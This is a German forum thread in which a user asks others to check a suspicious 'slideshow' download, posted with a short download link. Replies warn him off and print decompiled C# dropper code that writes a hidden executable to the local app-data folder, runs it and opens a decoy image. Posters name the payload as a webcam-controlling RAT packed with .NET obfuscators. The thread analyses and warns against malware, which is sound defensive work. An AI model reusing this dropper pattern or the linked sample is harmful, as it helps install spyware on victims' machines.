Kann jemand das Programm checken?

[x BoooM x]

Hey.

So ein Typ wollte mir einen Screen zeigen und hat den angeblich als Slideshow hochgeladen, wenn ich den Ordnet runterlade und entpacke wird ein Virus angezeigt, war mir eigtl. schon klar weil wieso sollte man einen Screenshot als Slideshow hochladen?

Habe das Programm natürlich nicht geöffnet.

Kann das jemand irgendwie prüfen was es anrichtet bzw. welchen Code es enthält?

Hier der Download für den Ordner:
http://goo.gl/hjRL2

[iToxic]

Lass die Finger davon:

ResourceManager manager = new ResourceManager("files", Assembly.GetExecutingAssembly()); File.WriteAllBytes(Environment.GetFolderPath(Envir onment.SpecialFolder.LocalApplicationData) + "sEoycl_rRQ.exe", (byte[]) manager.GetObject("QOaWGvoyKO")); Process.Start(Environment.GetFolderPath(Environmen t.SpecialFolder.LocalApplicationData) + "sEoycl_rRQ.exe"); File.WriteAllBytes(Environment.GetFolderPath(Envir onment.SpecialFolder.LocalApplicationData) + "RqDNeJTNBv.jpg", (byte[]) manager.GetObject("ZuhHWnLJVd")); Process.Start(Environment.GetFolderPath(Environmen t.SpecialFolder.LocalApplicationData) + "RqDNeJTNBv.jpg");

Wenn er dir Bilder schicken will, dann soll er dir sie so schicken

[Chrissy]

Slideshow hochladen als Screenshot?

Andersrum screenshot als slidesho

[x BoooM x]

Lass die Finger davon:


Wenn er dir Bilder schicken will, dann soll er dir sie so schicken

Was bedeutet der Code? Bzw. was richtet er an?

[Sploxfreak]

Programm in .Net Reflector

Spoiler:

Wenn man das Programm ausführt wird einmal der Trojaner aus den Resourcen geladen und ausgeführt und einmal das IMG aus den Resourcen geladen und ausgeführt.

[iToxic]

Was bedeutet der Code? Bzw. was richtet er an?

Er dropt ne andere Datei, welche eine Server.exe ist (RAT)

Es werden WebCam und co kontrolliert...

Die gedroppte Datei ist "geschützt" mit:

Babel .NET 4.0.0.0
DeepSea 4.0